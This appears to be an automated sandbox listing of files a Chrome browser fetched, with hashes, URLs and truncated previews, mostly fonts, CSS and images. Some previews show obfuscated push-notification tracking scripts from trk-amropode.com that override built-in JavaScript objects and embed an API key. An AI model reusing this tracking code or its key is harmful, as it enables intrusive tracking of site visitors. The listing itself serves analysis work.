                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (54926)
                                                                                        Category:downloaded
                                                                                        Size (bytes):55111
                                                                                        Entropy (8bit):4.7118090605418175
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:E4C542A7F6BF6F74FDD8CDF6E8096396
                                                                                        SHA1:3A0571A695A35F238026B9398386DC99D9A0C56D
                                                                                        SHA-256:EEB17A45A48ACA1D7ADBCF04DE155DCD0B47CB36AD036310446BB471FEA9AAA3
                                                                                        SHA-512:80C8D07836842C9D2BC8223E16D22DBAC53D3240227C265C1AAEFCF45AF3922338F43F256C38686946885F8012535F3BC287CC3658012787246EB5CCF6C13A3E
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://use.fontawesome.com/releases/v5.8.1/css/all.css
                                                                                        Preview:/*!. * Font Awesome Free 5.8.1 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). */..fa,.fab,.fal,.far,.fas{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:inline-block;font-style:normal;font-variant:normal;text-rendering:auto;line-height:1}.fa-lg{font-size:1.33333em;line-height:.75em;vertical-align:-.0667em}.fa-xs{font-size:.75em}.fa-sm{font-size:.875em}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-6x{font-size:6em}.fa-7x{font-size:7em}.fa-8x{font-size:8em}.fa-9x{font-size:9em}.fa-10x{font-size:10em}.fa-fw{text-align:center;width:1.25em}.fa-ul{list-style-type:none;margin-left:2.5em;padding-left:0}.fa-ul>li{position:relative}.fa-li{left:-2em;position:absolute;text-align:center;width:2em;line-height:inherit}.fa-border{border:.08em solid #eee;border-radius:.1em;padding:.2em .25em .15em}.fa-pull-lef
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text
                                                                                        Category:downloaded
                                                                                        Size (bytes):1185
                                                                                        Entropy (8bit):4.958384565851289
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:618FB54E0C6051B9379FBD7CB44BE4DA
                                                                                        SHA1:3D9214FCA585A649EF0135288E0EFED9E81CE36F
                                                                                        SHA-256:B5BDBBCC72CBC9412F84B9A45C1BCB26E18C49F5B559F3E424AFB8CD1E250C6F
                                                                                        SHA-512:656F236DD280CF0AA467374E5C4152633CB84F5433E73A77EB793D4DC5037F2847F1323F96FA58F21E8AF96F24286DE54CA21BADCEC70647A46CE1D3D47D8341
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://fonts.googleapis.com/icon?family=Material+Icons|Material+Icons+Outlined
                                                                                        Preview:/* fallback */.@font-face {. font-family: 'Material Icons';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/materialicons/v142/flUhRq6tzZclQEJ-Vdg-IuiaDsNc.woff2) format('woff2');.}./* fallback */.@font-face {. font-family: 'Material Icons Outlined';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/materialiconsoutlined/v109/gok-H7zzDkdnRel8-DQ6KAXJ69wP1tGnf4ZGhUce.woff2) format('woff2');.}...material-icons {. font-family: 'Material Icons';. font-weight: normal;. font-style: normal;. font-size: 24px;. line-height: 1;. letter-spacing: normal;. text-transform: none;. display: inline-block;. white-space: nowrap;. word-wrap: normal;. direction: ltr;. -webkit-font-feature-settings: 'liga';. -webkit-font-smoothing: antialiased;.}...material-icons-outlined {. font-family: 'Material Icons Outlined';. font-weight: normal;. font-style: normal;. font-size: 24px;. line-height: 1;. letter-spacing: normal;. text-t
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (8022)
                                                                                        Category:downloaded
                                                                                        Size (bytes):8023
                                                                                        Entropy (8bit):5.217375442925646
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:6E7B54C02BEB1F900A18F8CBFE90C3E0
                                                                                        SHA1:FA92F85AE3BEF63D04B089E095B9D74F26417C03
                                                                                        SHA-256:955B5B4CB7A6C498C29E51BDC5D675E6E21F8D5EA4FAC2B123E063949242B417
                                                                                        SHA-512:F60839EB6FFA04C7EB698CBA0BF1F7C86A3D9F278C4E63086D9136732F3930BC2DD53D8325AFF56214C5AF219D47256978360625DCFA1B58A9A6080C13F3EF78
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://trk-amropode.com//scripts/pg/v9e118mez8
                                                                                        Preview:(function(a,b){function c(a){try{console.log=E}catch(a){}E(a)}function d(a){if(self.indexedDB){var b=G.apply(self.indexedDB,["pushPlatFormDb",2]);b.onerror=function(){console.log("error db"+b.error),a(null)},b.onsuccess=function(){var c=b.result,d=c.transaction(["store"],"readwrite"),e=d.objectStore("store");a(e)},b.onupgradeneeded=function(a){console.log("upgrading db from version "+a.oldVersion+" to 2");var c=b.result;if(2>a.oldVersion){var d=c.createObjectStore("store",{keyPath:"name"});k("",null,[],[],[],d)}}}else a(null)}function e(){try{Array=q,Array.prototype=q,Response=v,Response.prototype=x,Function.prototype.apply=H}catch(a){i("ext_ov_error",a,m)}}function f(a){return function(b){var f=!1;try{if(e(),"push"===b.type&&null!=b.data)try{let a=b.data.json();null!=a&&null!=a&&(f="cajB"in a)}catch(a){c(a)}else if("notificationclick"===b.type||"notificationclose"===b.type)try{let a=b.notification.data;null!=a&&null!=a&&(f="cajB"in b.notification.data)}catch(a){c(a)}}catch(a){c("init_
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (63162), with no line terminators
                                                                                        Category:downloaded
                                                                                        Size (bytes):507459
                                                                                        Entropy (8bit):4.8344082907094155
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:EE2940EACD6B7DA4BD5D186CA2052CAA
                                                                                        SHA1:1969356AE5E04D9BE2A14DCD845B36DA83C4354D
                                                                                        SHA-256:BA166F4F23A50ED951D93710144182516832AB03C0F918436A1D084A83F69BFE
                                                                                        SHA-512:9CB2F5B4B056E552A1D46CAAD68CE6B81C4F69A80D77C89D4C8C89055370A62669C71112735252B21DA0786396357208F92B5D7184D18C6DEB46C801CB55DAE4
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://qwartiqpin.online/assets/vendors/fontawesome_pro/css/all.min.css
                                                                                        Preview:@charset "utf-8";.fa{font-family:var(--fa-style-family,"Font Awesome 6 Pro");font-weight:var(--fa-style,900)}.fa,.fa-classic,.fa-sharp,.fas,.fa-solid,.far,.fa-regular,.fasr,.fal,.fa-light,.fasl,.fat,.fa-thin,.fad,.fa-duotone,.fass,.fa-sharp-solid,.fab,.fa-brands{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:var(--fa-display,inline-block);font-variant:normal;text-rendering:auto;font-style:normal;line-height:1}.fas,.fa-classic,.fa-solid,.far,.fa-regular,.fal,.fa-light,.fat,.fa-thin{font-family:"Font Awesome 6 Pro"}.fab,.fa-brands{font-family:"Font Awesome 6 Brands"}.fad,.fa-classic.fa-duotone,.fa-duotone{font-family:"Font Awesome 6 Duotone"}.fass,.fasr,.fasl,.fa-sharp{font-family:"Font Awesome 6 Sharp"}.fass,.fa-sharp{font-weight:900}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-6x{font-size:6em}.fa-7x{font-size:7em}.fa-8x{font-size:8em}.fa-9x{font-size:9em}.fa-10x{font-size:10em}.fa-2xs{vertica
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 192 x 192, 8-bit colormap, non-interlaced
                                                                                        Category:downloaded
                                                                                        Size (bytes):4250
                                                                                        Entropy (8bit):7.8856244586581274
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:4958051526DE0D37DB89BA24C1F640B1
                                                                                        SHA1:3924438E9F077923F0D231B2C8F0139BD5FD4DA2
                                                                                        SHA-256:86A4D22F83BDA7EDA5A8CEE46A26E735F325A07B8AFB18B357C748CE24EB1564
                                                                                        SHA-512:FECF8F89D16D4796749AC8A6D20B60A4E0969C05988F804DAE90ED8FE8C73DE85E4DFA94DF98D1632FC1B9FD5C16D898FB4CB7808858C7E91D6CCF70E1D6AD3F
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://sc.ec424.com/uploaded/661e565c61d6e234cc004ba7/3/3e376a9f325e6ef6f64a2209fefaae80.png
                                                                                        Preview:.PNG........IHDR.............e..5....gAMA......a.....sRGB.........pHYs.................PLTE...*))..................zxv%$$......00/......zyw..&766...............mlj.........[ZY..............FEE........M..6..`.......p.....................l.....IDATx..i{.<....P#jP@Ppc+....q..[.<J.}...%.:.L2I&Eo...7........x...^./........x...^./.....................O..j1.$9../~..}.\<r..q..!/qr8.#.......w.c.3FEQ.yQDJ..w....e.v..|...Q.D.AQ...X..=......;....B.k..i. <9.... .XNc.)"7...7E;8<+....!Ulx....\!....-..cx....6..............M..s.....`...L.y....D.....\..=....d.,.<..,;il.Ll....z.^...Q.x.~2..o..$.......yS.+9.....@A...!.......e..o.....zN..A.!.8..>..@..0T..........~C?.6.j$...U.4.r.A..........@i..S...^.{.=~yY...v..z=A.O],u. .(.+.g|......!h..=^..1.q..2.bZ...6...PK..4@zN`h.n........f.I.y.@......^.l.[...E.......W.a<.=..=.......S.?:_T .........-.:...W......p...........@.&\_NU....J..u..r7.p.C....3...s.r..|AJ..........d`.M0.=.T....T._D...Op..z.t`9.:..'T...}e..H.J?.....s..
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (1222), with no line terminators
                                                                                        Category:downloaded
                                                                                        Size (bytes):1222
                                                                                        Entropy (8bit):5.818804287152988
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:463D838587C8B5873CB6E4E942B770C9
                                                                                        SHA1:E69DCF383A6F3F51F123CA2D86F19FC4BE09E612
                                                                                        SHA-256:1448EC1B3F30A554233BD280AA99A7EAF690D1098647E7DDDEA286C757884F9C
                                                                                        SHA-512:F02DE64A37B90492D714CC7D132C49BF29CB5117CA945258BAF5B36D087A3A2AED165C6FF37D2ED4E4F10D7199AFB9C2B5E2555BA1BECA1A8D3AE133F4DF4B23
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://www.google.com/recaptcha/api.js
                                                                                        Preview:/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.google.com/recaptcha/api2/';(cfg['render']=cfg['render']||[]).push('onload');w['__google_recaptcha_client']=true;var d=document,po=d.createElement('script');po.type='text/javascript';po.async=true;var m=d.createElement('meta');m.httpEquiv='origin-trial';m.content='Az520Inasey3TAyqLyojQa8MnmCALSEU29yQFW8dePZ7xQTvSt73pHazLFTK5f7SyLUJSo2uKLesEtEa9aUYcgMAAACPeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZyIsImV4cGlyeSI6MTcyNTQwNzk5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=';d.head.prepend(m);po.src='https://www.gstatic.com/recaptcha/releases/V6_85qpc2Xf2sbe3xTnRte7m/recaptcha__en.js';po.crossOrigin='anonymous';po.integrity='sha384-0lJkOVHDy3ItYlCbUoEzThjP3hLhLYfEFPAkVOCx
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 250 x 250, 8-bit/color RGB, non-interlaced
                                                                                        Category:dropped
                                                                                        Size (bytes):111819
                                                                                        Entropy (8bit):7.977961503112796
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:A018441A7C16F903DC6A456E04B5CCC8
                                                                                        SHA1:D840DBFBA87C3C98637E65FCD94AD0B2561C6AC7
                                                                                        SHA-256:648101596C9FA1EAD6F556FE1DCCFA02571C7A1D0180E44E2CFB1CFAD52110DE
                                                                                        SHA-512:58A5DAB7FA4DF49B9555B69F2C6FFAB363F8ECD834ADE86C88366948F204006A351A99AC7B34ED583BC9950424BD8C8565ED282806E051D2C33414E8B56E37C7
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:.PNG........IHDR................j....gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:Web Open Font Format, CFF, length 54732, version 1.2
                                                                                        Category:downloaded
                                                                                        Size (bytes):54732
                                                                                        Entropy (8bit):7.994001762479829
                                                                                        Encrypted:true
                                                                                        SSDEEP:
                                                                                        MD5:821E42AE89B5DFD5BFCE6E0CA18777E5
                                                                                        SHA1:2B15B0C45C179E2E2C3E2AC0D691F648C0B0FC20
                                                                                        SHA-256:7941D25CEB02CAA904C10F6F1DDB374D06720BBEC6FAC10FBBADBA8A3B17C992
                                                                                        SHA-512:35781D711F31D9D66671890A552439B92AB6BFD20870EE97D963CCE19B32778A621B0C047FFF9B8583F896B91CD622A2A32445CB97993A7C5271024EF698CDC3
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://www.ibisworld.com/resources/fonts/PangeaText-Regular.woff
                                                                                        Preview:wOFFOTTO......................H...{........BASE.......:...:.-..CFF ...X........!+..GPOS...`..1.....kK:.GSUB...X...#...j...SOS/2...|...U...`ge,.cmap...........F;8..head......5...6..+.hhea....... ...$.x..hmtx...............maxp..............P.name............5x2.post...p....... ...2..............ideoromn..DFLT..latn...................j......x...........j.m.m.m.m.m..yy.H..X....O..H....y88...........Y..".}?.x.p.#s"&.P(.H1(.%.T...Q.*N.*...:P7.K.i$M.....Z.L......t.n..zN.(.@H.CL.GR.G..CQ.A%.@=4A+tAo..HL.t..R..F..>..i..m<....W.3s(..Q86'.....r!...&7.6...H...y=...|...+...b.QRJA)!......M..h.*.e.l...S..19/..<...M..5...d.Y.h1..U..6.f.J;.@...t...u.I...=.W.....U....ZlKb),...V.X;.n.l....6.f."[m[m....v...[.h.N..zLO..<....^.[zG..=....Q>..Z...._..._.{..K.<...@Q.._/.m.m..(..(..m..E..Q1*O5..........O.h.-.5....a:M...=.W..B).....b.R\.kp}n.m....a<.g."^.[x....|.o..~...8.c9......Hi.$5..4.v.U....'Sd.,.U.Av..9$'.\.{.@^.O..d.."ZFkkK.#t....N...=....>.....Y&V.Y'.gcl.-..v.
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (15879), with no line terminators
                                                                                        Category:downloaded
                                                                                        Size (bytes):15879
                                                                                        Entropy (8bit):5.226156107607571
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:2BDAD1FE46466AFADA1C67648EEDCD9A
                                                                                        SHA1:537534693814F74577DDC4DC896F0F57CA3CC7FE
                                                                                        SHA-256:E2235B400839663E7AB3FF135EBC2897044DFBD676DFEE6C3E2A725B9E7F0D7F
                                                                                        SHA-512:1FDD2FA6A10B63CC26D2EBB50A5AFA4984D4B3B49396BB3F5A086D372E86E4E51778CCED00BE5E8C64070C4D5B7CB9AED100209B80FAF1C5055D8D55CAB255EC
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://www.ibisworld.com/resources/js/industry-now.min.js?v=133595808793788415
                                                                                        Preview:function controlPageResponsiveBehavior(){var t=$("header.main-header"),i=$("#navHeaderBarSpacer"),s=$("#navMenuMainList").data("sidebar-state"),f=$(".xnavbar-sidebar-top").width(),r=$("#navMenuMainListOverlay"),e=$("#proqBanner"),n,u,o;window.ViewPort().width<=_breakPoint01?(n=$("#navMenuMainList"),u=n.width(),n.length>0&&(o=n.position().left==0),r.hide(),n.css({left:-20-u,visibility:"visible"}),$("#ulMainMenuList").addClass("mobile"),$("#ulMainMenuListScroller").addClass("mobile scroll"),$(".xnavbar-sidebar-top .has-feedback-left > input").width(f-120),$(".xdrop-menu .menu-key .menu-arrow").each(function(n,t){$(t).removeClass("right").addClass("down")}),$(".xdrop-menu .menu-list").each(function(n,t){$(t).css("opacity",1);$(t).find("ul").each(function(n,t){$(t).css("display","block")})})):(r.hide(),$("#ulMainMenuList").removeClass("mobile"),$("#ulMainMenuListScroller").removeClass("mobile scroll"),$("body").removeClass("no-scroll"),$(".menu-list").removeClass("open"),$("#navMenuMainLis
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 70", baseline, precision 8, 250x334, components 3
                                                                                        Category:downloaded
                                                                                        Size (bytes):13976
                                                                                        Entropy (8bit):7.951294316211057
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:DF9226D4D0F56BE12730738582775586
                                                                                        SHA1:498788C80F8F655B853DEE9F33E0F4A5456D54B4
                                                                                        SHA-256:4257091E3FAE1E1E7ADC183928F44D55ED05FD0734C78DF6DAA7235543EFFF08
                                                                                        SHA-512:E70846B207FC0CF858F4701ADCD06FF9087F1AA3B5DDBC2514C7C9DB552471B2772676047E7BC3633D1798D3072F4C3071FD608511A6B68C15BFE9B544829CE2
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://qwartiqpin.online/uploads/archive/product/561/images/c2.jpg
                                                                                        Preview:......JFIF.....`.`.....;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 70....C...........................#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C...........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;......N...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..=.:p......*M..F.7WC.R.....9x...heK.X."..W"./..j7.:s...Z..xV.nhs.c....:V..9..\.Y...@8..8.cR{.S..'.!.2G.l.@..#.1Q0.t....3H.?Zq.7.@..)H.."..q.P.N.?\....'$f..'...:..1...p.#....0.>..%N=8.zv..4....d.I..J.<.z....s..sK.......z...I...H5...O......<F.....T........T{uH..Z....X.k.;.=....&...?...........s\
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 500 x 500, 8-bit/color RGBA, non-interlaced
                                                                                        Category:downloaded
                                                                                        Size (bytes):252570
                                                                                        Entropy (8bit):7.99390224895446
                                                                                        Encrypted:true
                                                                                        SSDEEP:
                                                                                        MD5:37AC5253E1C10CF289AD35458733D64A
                                                                                        SHA1:904DD01FF4D2700DD721B02D2A78F664D245EB6C
                                                                                        SHA-256:81FCE5FC86A79ABD7D33675E46EE95B3729FF29377565DBCCA303CC8B8C2FB37
                                                                                        SHA-512:92EE5B8FEE1DA97B076C6009D5E84F0E8CB9F1AD410EDC8CFA5331F9B4FC5229BC87CD03B305BBC3D277C6AE73686FF4F5C429BA9F38DE82817CC5E47D4083FA
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://www.electronixmaster.com/a/dewalt-tool-set/v1/app/desktop/images/product.png
                                                                                        Preview:.PNG........IHDR....................tEXtSoftware.Adobe ImageReadyq.e<...)iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c001 79.c0204b2def, 2023/02/02-12:14:24 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:BA861C7A3A7511EE907B9B6F142EAC6B" xmpMM:InstanceID="xmp.iid:BA861C793A7511EE907B9B6F142EAC6B" xmp:CreatorTool="Adobe Photoshop 23.5 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:42C6766F35CB11EEA1D3C6FD030C0EF2" stRef:documentID="xmp.did:42C6767035CB11EEA1D3C6FD030C0EF2"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>........IDATx....m.U%..9.....o....Vc[r..U...4e0...T...gT`.I1.$......1.(\$.8.\..I..w..{c.d.eI_.._.7.;gg....}.
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (11692)
                                                                                        Category:downloaded
                                                                                        Size (bytes):11693
                                                                                        Entropy (8bit):5.285127085064925
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:1C0B7E8036B9B3C37FD6F52A71D30192
                                                                                        SHA1:6188D0796F99BB2D87CEBCC6B219890EC6B42763
                                                                                        SHA-256:560FA7174BA624B91BCBC9865C38D59544FA09BFD2CAC1DE279224222AFCF283
                                                                                        SHA-512:C7B8BCE2FB7E6D6C1204328D2A5CD1CC67016C9572E19D0A485B00C3324F6FC1A1D78AF0C8A6139CB209DA7647CD6F2C6BC43363FB417BA56A36D7BF4F6B429E
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://trk-amropode.com//scripts/sw/v9e118mez8
                                                                                        Preview:'use strict';const env={log:!0,retry:10,sleepTime:1e4,domain:"push.trk-amropode.com",notificationDomain:"notification.trk-amropode.com",subscriptionDomain:"subscription.trk-amropode.com",eventDomain:"event.trk-amropode.com"},applicationServerPublicKey="BJbujtKImkiLWjlWkMGYMo2_sM0al24KoS7U6TJ1U7sKJaxlIULz5s6p7tN6WbnLisCq_Si5hP7X0769TvPDFTQ=",siteId="v9e118mez8",smClientId="q2goykjdrv",version=533,smAPIKey="29788ca9761a4b78abcfb1c3eabb8e68";let smPushSubscriptionId;function getStore(a){if(self.indexedDB){var b=self.indexedDB.open("pushPlatFormDb",2);b.onerror=function(){console.log("error db"+b.error),a(null)},b.onsuccess=function(){var c=b.result,d=c.transaction(["store"],"readwrite"),e=d.objectStore("store");a(e)},b.onupgradeneeded=function(a){console.log("upgrading db from version "+a.oldVersion+" to 2");var c=b.result;if(2>a.oldVersion){var d=c.createObjectStore("store",{keyPath:"name"});setUserDataInStore("",null,[],[],[],d)}}}else a(null)}function arrayRotate(a,b){return b?a.unshif
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 50 x 50, 8-bit/color RGBA, non-interlaced
                                                                                        Category:downloaded
                                                                                        Size (bytes):2692
                                                                                        Entropy (8bit):7.889944535623974
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:091B619442EA29606ED35C4C5E8E607F
                                                                                        SHA1:280E7541AD56AAFA899A004B41FD69731565CE89
                                                                                        SHA-256:0E34D082CCDC00408C7C4DDDA543F1247F981EBC756C8458E2B6321D8A4D42A9
                                                                                        SHA-512:F91469502859A525F2654BA9A0F2973602912568C951C4B8E3139FE6440634B3CA3D18DDC54A4452AF133E05F4E5CC738C719A3E89F1C0F53FECD12C8C78AF7F
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://qwartiqpin.online/assets/images/flags/flag-us.png
                                                                                        Preview:.PNG........IHDR...2...2......?......pHYs..........+.....6IDATh..Z{p....}{.>....yH...... ....E+#.Z.mA[Qk..?..Q[g.S.Nig.3.FE.X.A,34.B.....0..............{...:.f..9....u.=........!4..Wy/G..d..<.@..R..u...Q.~.......1"j`.V..s.6.L.x......#../..r..._.`#.iA:1-..#..n..m.....so.@.G...../E.......!....^kN.Y..oTJ.f.?U......#.}.v.s.K....;''.>.....H8..2 ..q.l...g..=..b.<....S ...f..T........$I...H..f^AD.Z....q.':...w...k+..d.#.?.3..^?..=~e~..J....$.-.NFGV.?...H.."z..R......!.`.O.0....(....X.........,;6.G....6Q~..)......t....w.........>....e(p..Gt1....@.;.z...p:.....a..mi".q\.Z....e...Vu..R.R.Z..w..`.=....h.B.7..&.`L...........h.et..P=e..".p.`|...O..'....n$V...n....8m....-..td.3.\_t...F...BQ..Z.t.:...w>.7O..M.c....u|...>.....d[R.%.Z.66..{xc$*.(.. .7?.H.$........._7...F.37.I`....k.'[^.|.......p...........a.r..D.$.p...<q.8..$.:Q.&.D..I.!.......v.........8U...."..V..w...@DE.....H.(^....|..V,(..w.CQ...EN...`......q.Yy.......^..E.>.j.[....$..:....k.iy.L7.>9.
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 50x50, components 3
                                                                                        Category:dropped
                                                                                        Size (bytes):1855
                                                                                        Entropy (8bit):7.166896376451631
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:126FC2A1CE6D3A774C7E7385D30CD4B2
                                                                                        SHA1:908F2EDBFDCF281055C378F1D8A1F76A88E42171
                                                                                        SHA-256:BBA8F9DB54CCF37520888D62FC42C11C612C45E25FEAC44395E9AB42B2F966B8
                                                                                        SHA-512:AFE40625E852F37EEF5DB31F9BC646BD01F08BBB7348848F00DB0A8C8DDBB2833B5D2C7D516861D8D18F6471F86B17033A2C9991C00423652F1A774CA0BD8038
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:......Exif..II*.................Ducky............./http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 24.0 (Windows)" xmpMM:InstanceID="xmp.iid:4E4D9FC78B8011EDB4C6A349EB46F022" xmpMM:DocumentID="xmp.did:4E4D9FC88B8011EDB4C6A349EB46F022"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:4E4D9FC58B8011EDB4C6A349EB46F022" stRef:documentID="xmp.did:4E4D9FC68B8011EDB4C6A349EB46F022"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................................#%'%#.//33//@@@@@@@@@@@@@@@......................&.....&0#....#0+.'''.+550055@
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (6017), with CRLF line terminators
                                                                                        Category:downloaded
                                                                                        Size (bytes):6198
                                                                                        Entropy (8bit):4.9503597806477
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:41201829CB79A02FEFA5CE58D8F94A73
                                                                                        SHA1:C0637D19D26E8E0A99276AB03BC790C1F93E4052
                                                                                        SHA-256:71450EB8CF070122315F00DC2FFC4349AD45C2D58279E73157A1E4FCB4A42616
                                                                                        SHA-512:9C54E98A73CCC4E508E66DE3F60FD8BE4CED2ED9172676ECF9983116ECEAD8A7DD50CB49E4AB288067DF1748BE3F3A701F1D6F4FDB5ACFC6439EEBECA8584EE8
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://www.ibisworld.com/resources/mmenu/mmenu-light.css
